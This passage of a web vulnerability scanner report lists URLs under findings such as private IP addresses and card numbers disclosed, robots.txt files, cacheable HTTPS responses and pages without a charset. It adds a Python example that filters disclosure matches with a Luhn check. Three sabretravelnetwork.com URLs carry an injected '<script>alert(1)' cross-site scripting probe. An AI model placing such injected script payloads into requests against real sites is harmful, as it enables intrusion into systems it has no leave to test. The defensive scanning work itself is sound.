22.28. http://www.nike.com/nikeos/global/js/plugins/jquery.cookie.js

22.29. http://www.orbitz.com/shared/js/exitApp.js

22.30. http://www.sabreairlinesolutions.com/home/

22.31. http://www.sabreairlinesolutions.com/js/jquery.colorbox-min.js

22.32. http://www.sabreairlinesolutions.com/js/jquery.cookie.js

22.33. http://www.sabreairlinesolutions.com/js/jquery.equalHeights.js

22.34. http://www.sabrehospitality.com/js/modal.js

22.35. http://www.sabrehospitality.com/js/roundies.js

22.36. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

22.37. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

22.38. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

22.39. http://www.sabretravelnetwork.com/images/home-text.png

22.40. http://www.sabretravelnetwork.com/js/colorbox/jquery.colorbox-min.js

22.41. http://www.sabretravelnetwork.com/js/jquery.equalHeights.js

22.42. http://www.travelocity.com/

22.43. http://www.travelocity.com/472a

22.44. http://www.turkishairlines.com/static/js/plugin/datepicker/date_en.js

22.45. http://www.turkishairlines.com/static/js/plugin/jquery-fieldselection.pack.js

22.46. http://www.turkishairlines.com/static/js/plugin/jquery.combo/jquery.combo.min.js

22.47. http://www.turkishairlines.com/static/js/plugin/jquery.cookie.js

23. Private IP addresses disclosed

23.1. http://api.connect.facebook.com/crossdomain.xml

23.2. http://api.connect.facebook.com/restserver.php

23.3. http://api.facebook.com/method/fql.query

23.4. http://api.facebook.com/restserver.php

23.5. http://connect.facebook.net/en_US/all.js

23.6. http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf

23.7. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529178&tile=711446054649628&section=results

23.8. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

23.9. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

23.10. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

23.11. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

23.12. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results

23.13. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

23.14. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

23.15. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

23.16. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

23.17. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

23.18. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

23.19. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

23.20. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=300x250&random=634531891718497471

23.21. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=1&random=634531891718497471

23.22. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=2&random=634531891718497471

23.23. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1295234161634531840155155327&adsize=728x90&pagepos=1&random=634531840155155327

23.24. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1967228532634531863146718750&adsize=728x90&pagepos=1&random=634531863146718750

23.25. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=334526774634531842119167547&adsize=728x90&pagepos=1&random=634531842119167547

23.26. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600

23.27. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

23.28. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=370629

23.29. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=854351

23.30. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.31. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.32. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.33. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.34. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.35. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.36. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.37. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.38. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.39. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.40. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.41. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.42. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.43. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.44. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.45. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.46. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.47. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

23.48. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

23.49. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

23.50. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

23.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

23.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

23.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

23.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

23.55. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

23.56. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

23.57. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

23.58. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

23.59. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

23.60. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

23.61. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

23.62. http://media.expedia.com/ads/travelhook/travelhook.js

23.63. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

23.64. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

23.65. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

23.66. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

23.67. http://static.ak.connect.facebook.com/connect.php/en_US

23.68. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

23.69. http://static.ak.connect.facebook.com/images/connect_sprite.png

23.70. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

23.71. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

23.72. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

23.73. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

23.74. http://static.ak.fbcdn.net/connect.php/js/FB.Share

23.75. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.76. http://travelocity.tt.omtrdc.net/m2/travelocity/mbox/standard

23.77. http://www.facebook.com/dialog/oauth

23.78. http://www.facebook.com/extern/login_status.php

23.79. http://www.facebook.com/extern/login_status.php

23.80. http://www.facebook.com/extern/login_status.php

23.81. http://www.facebook.com/extern/login_status.php

23.82. http://www.facebook.com/extern/login_status.php

23.83. http://www.facebook.com/extern/login_status.php

23.84. http://www.facebook.com/extern/login_status.php

23.85. http://www.facebook.com/plugins/like.php

23.86. http://www.facebook.com/plugins/like.php

23.87. http://www.facebook.com/plugins/like.php

23.88. http://www.facebook.com/plugins/like.php

23.89. http://www.facebook.com/plugins/like.php

23.90. http://www.facebook.com/plugins/like.php

23.91. http://www.facebook.com/plugins/like.php

23.92. http://www.facebook.com/plugins/like.php

23.93. http://www.facebook.com/plugins/like.php

23.94. http://www.facebook.com/plugins/like.php

23.95. http://www.facebook.com/plugins/like.php

23.96. http://www.facebook.com/plugins/like.php

23.97. http://www.facebook.com/plugins/like.php

23.98. http://www.facebook.com/plugins/like.php

23.99. http://www.facebook.com/plugins/like.php

23.100. http://www.facebook.com/plugins/like.php

23.101. http://www.facebook.com/plugins/like.php

23.102. http://www.facebook.com/plugins/like.php

23.103. http://www.facebook.com/plugins/like.php

23.104. http://www.facebook.com/plugins/like.php

23.105. http://www.facebook.com/plugins/like.php

23.106. http://www.facebook.com/plugins/like.php

23.107. http://www.facebook.com/plugins/like.php

23.108. http://www.facebook.com/plugins/like.php

23.109. http://www.facebook.com/plugins/like.php

23.110. http://www.facebook.com/plugins/like.php

23.111. http://www.facebook.com/plugins/like.php

23.112. http://www.facebook.com/plugins/like.php

23.113. http://www.facebook.com/plugins/like.php

23.114. http://www.facebook.com/plugins/like.php

23.115. http://www.facebook.com/plugins/like.php

23.116. http://www.facebook.com/plugins/like.php

23.117. http://www.facebook.com/plugins/like.php

23.118. http://www.facebook.com/plugins/like.php

23.119. http://www.facebook.com/plugins/like.php

23.120. http://www.facebook.com/plugins/like.php

23.121. http://www.facebook.com/plugins/like.php

23.122. http://www.facebook.com/plugins/like.php

23.123. http://www.facebook.com/plugins/likebox.php

23.124. http://www.facebook.com/plugins/likebox.php

23.125. http://www.facebook.com/plugins/likebox.php

23.126. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.127. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.128. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.129. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.130. http://xml.premierleague.com/crossDomain.html

24. Credit card numbers disclosed

24.1. http://www.cheaptickets.com/shop/hotelsearch

24.2. http://www.expedia.com/Hotel-Search

24.3. http://www.orbitz.com/shop/hotelsearch
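
The three disclosure categories above (22 to 24) are pattern matches over response bodies, and the credit-card category is where a scanner over-reports most: ad tile and transaction IDs such as the 15- and 16-digit values in the dm.travelocity.com URLs have exactly the shape of a PAN. The Python below is an added example, not code from the XSS.CX report or its crawler; it runs the same three matches over a constructed response body and filters card candidates with a Luhn check and private-IP candidates against explicit RFC 1918, loopback and link-local ranges. SAMPLE_BODY, its host names, addresses and numbers are all constructed.

```python
"""Passive disclosure checks (e-mail addresses, private IPs, card numbers) over a
response body, with the false-positive filtering a raw regex scan lacks. Added
example; SAMPLE_BODY and every value in it are constructed."""
import ipaddress
import re
from typing import Dict, List

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Dotted quads not embedded in a longer dotted number (so "1.2.3.4.5" is skipped).
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# 13 to 19 digits, optionally separated by single spaces or hyphens.
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
# Explicit ranges: RFC 1918, loopback and link-local. Python's is_private would
# also flag documentation ranges such as 203.0.113.0/24, which is not wanted here.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                 "127.0.0.0/8", "169.254.0.0/16")]


def find_emails(body: str) -> List[str]:
    """Distinct addresses, sorted; the report lists every file they appear in."""
    return sorted(set(EMAIL_RE.findall(body)))


def find_private_ips(body: str) -> List[str]:
    """Dotted quads inside PRIVATE_NETS. Version strings such as 3.0.79.569
    fail to parse as addresses and are dropped."""
    found = set()
    for candidate in IPV4_RE.findall(body):
        try:
            ip = ipaddress.ip_address(candidate)
        except ValueError:
            continue
        if any(ip in net for net in PRIVATE_NETS):
            found.add(str(ip))
    return sorted(found)


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check every real PAN passes; most IDs and random numbers fail it."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_card_numbers(body: str) -> List[str]:
    """Digit runs with a PAN length that pass Luhn and are not one repeated digit."""
    hits = []
    for match in CARD_RE.findall(body):
        digits = re.sub(r"[ -]", "", match)
        if 13 <= len(digits) <= 19 and luhn_ok(digits) and len(set(digits)) > 1:
            hits.append(digits)
    return hits


def scan(body: str) -> Dict[str, List[str]]:
    """All three checks for one response body, keyed by the report's category."""
    return {"emails": find_emails(body),
            "private_ips": find_private_ips(body),
            "cards": find_card_numbers(body)}


# Constructed response body: one well-known card test number (4111...), one
# 16-digit tile ID that a raw regex would also flag, two private IPs, one
# public documentation IP and a four-part version string shaped like a quad.
SAMPLE_BODY = """<!-- built by ops@corp.example; origin 10.20.30.40, lb 192.168.1.5 -->
var tile = "1234567890123456"; var testcard = "4111-1111-1111-1111";
var ver = "3.0.79.569"; var edge = "203.0.113.7";"""

if __name__ == "__main__":
    for kind, values in scan(SAMPLE_BODY).items():
        print(f"{kind}: {values}")
```

The Luhn filter is what separates the tile ID from the test card in the sample; for a real triage pass, the remaining hits are still only candidates, and the file they sit in (a JS library, an ad tag, a search result page) decides whether the finding is a leak or test data.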

25. Robots.txt file

25.1. http://a.analytics.yahoo.com/fpc.pl

25.2. http://ad-dc2.adtech.de/adperf%7C2.0%7C327%7C2812329%7C0%7C170%7CAdId=6453063

25.3. http://ad.doubleclick.net/adj/cm.guardian/

25.4. http://ad.technoratimedia.com/st

25.5. http://ad.turn.com/server/ads.js

25.6. http://ad.yieldmanager.com/st

25.7. http://ad4.liverail.com/crossdomain.xml

25.8. http://ads.pointroll.com/PortalServe/

25.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

25.10. http://b.scorecardresearch.com/b

25.11. http://bcp.crwdcntrl.net/4/c=412%7Crand=756616954%7Cpv=y%7Crt=ifr

25.12. http://beacon.securestudies.com/scripts/beacon.dll

25.13. http://c.betrad.com/a/n/44/546.js

25.14. http://cas.criteo.com/delivery/ajs.php

25.15. http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf

25.16. http://cdn.turn.com/server/ddc.htm

25.17. http://d.tradex.openx.com/afr.php

25.18. http://ehg-twi.hitbox.com/HG

25.19. http://googleads.g.doubleclick.net/pagead/ads

25.20. http://hits.guardian.co.uk/b/ss/guardiangu-football,guardiangu-network/1/H.22.1/s95621589564252

25.21. http://idpix.media6degrees.com/orbserv/hbpix

25.22. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap

25.23. http://m.xp1.ru4.com/activity

25.24. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

25.25. http://openx.px.invitemedia.com/openx_sync

25.26. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

25.27. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

25.28. http://premiumtv.122.2o7.net/b/ss/premiumtvpremierleague/1/H.2-pdv-2/s98395569906570

25.29. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

25.30. http://resource.guim.co.uk/books/gubookshop/thumbnail/images.bertrams.com/ProductImages/services/GetImage

25.31. http://s0.2mdn.net/2502400/LloydsTSB_PIA_Direct_728x90.swf

25.32. http://safebrowsing.clients.google.com/safebrowsing/gethash

25.33. https://secure.mlb.com/resetPassword.do

25.34. http://servedby.flashtalking.com/imp/1/16628

25.35. http://speed.pointroll.com/PointRoll/Media/Banners/ToyoTires/894167/ProxesSweeps_300x250_Flash_r01.swf

25.36. http://sync.mathtag.com/sync/img

25.37. http://tag.admeld.com/id

25.38. http://www.goal.com/en/teams/england/97/man-utd-news

25.39. http://www.google-analytics.com/__utm.gif

25.40. http://www.guardian.co.uk/football/manchester-united

25.41. http://www.luminate.com/widget/v3/53d1ac1014/config/

25.42. http://www.manutd.com/

25.43. http://www.premierleague.com/page/Home/0,,12306,00.html

26. Cacheable HTTPS response

26.1. https://axptravel.americanexpress.com/consumertravel/customlogin.do

26.2. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

26.3. https://secure.mlb.com/resetPassword.do

26.4. https://www.expedia.com/static/default/default/stubs/adserver.json

26.5. https://www.hotelplanner.com/

26.6. https://www.hotelplanner.com/Accept/Reserve.cfm

26.7. https://www.hotelplanner.com/LastActive.cfm

26.8. https://www.hotelplanner.com/TT.cfm

27. HTML does not specify charset

27.1. http://ad.doubleclick.net/adi/N5282.161249.ADNETIK.COM/B5256632.283

27.2. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

27.3. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

27.4. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

27.5. http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

27.6. http://ad.doubleclick.net/adi/gna.en/level2

27.7. http://ad.yieldmanager.com/iframe3

27.8. http://ads.pointroll.com/PortalServe/

27.9. http://amch.questionmarket.com/adscgen/st.php

27.10. http://aud.pubmatic.com/AdServer/Artemis

27.11. http://content.pulse360.com/0802A570-D4D3-11E0-8F5A-3A5C91016B62

27.12. http://content.pulse360.com/D712CB66-D4D2-11E0-ACD9-355C91016B62

27.13. http://content.pulse360.com/F09A1BDE-D4D2-11E0-99F0-875B91016B62

27.14. http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html

27.15. http://content1.admonkey.dapper.net/clients/expedia/SearchResults_US.html

27.16. http://d.xp1.ru4.com/meta

27.17. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

27.18. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

27.19. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

27.20. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

27.21. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

27.22. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

27.23. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

27.24. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

27.25. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

27.26. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

27.27. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

27.28. http://fls.doubleclick.net/activityi

27.29. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

27.30. http://hublotnation.com/

27.31. http://hublotnation.com/wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

27.32. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=INFOSITE&PLACEMENT=CCOL1&DEST=BOS&LANGID=1033&ADSIZE=300x250&NUMCHILDREN=0&STAR=40&REGION=US.CA&BRAND=Omni&DAYSUNTILSTART=1&IPGEO=807.SANJOSE

27.33. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=760f623e-aac2-41c7-afce-35fce14d824d&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

27.34. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

27.35. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

27.36. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

27.37. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=1394b05b-303b-4e18-8e3a-6c1de94b012e&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

27.38. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

27.39. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

27.40. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.41. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

27.42. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

27.43. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

27.44. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

27.45. http://pixel.invitemedia.com/data_sync

27.46. http://showadsak.pubmatic.com/AdServer/AdServerServlet

27.47. http://tags.bluekai.com/site/2565

27.48. http://tags.bluekai.com/site/2625

27.49. http://uxm.thousandeyes.com/rest/json

27.50. http://www.aon.com/manchesterunited/

27.51. http://www.aon.com/unitedin2010/

27.52. http://www.aon.com/unitedin2010/index.jsp

27.53. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

27.54. http://www.cheaptickets.com/cacheable/ad.html

27.55. http://www.cheaptickets.com/cacheable/ad_empty.html

27.56. http://www.cheaptickets.com/cacheable/cedexis/radar.html

27.57. http://www.cheaptickets.com/cacheable/empty.html

27.58. http://www.cmegroup.com/advance/

27.59. http://www.cmegroup.com/advance/about.html

27.60. http://www.cmegroup.com/advance/build-1.html

27.61. http://www.cmegroup.com/advance/build-2.html

27.62. http://www.cmegroup.com/advance/build.html

27.63. http://www.cmegroup.com/advance/elements.html

27.64. http://www.cmegroup.com/advance/finance-1.html

27.65. http://www.cmegroup.com/advance/finance-2.html

27.66. http://www.cmegroup.com/advance/finance.html

27.67. http://www.cmegroup.com/advance/intro.html

27.68. http://www.cmegroup.com/advance/plant-1.html

27.69. http://www.cmegroup.com/advance/plant-2.html

27.70. http://www.cmegroup.com/advance/plant.html

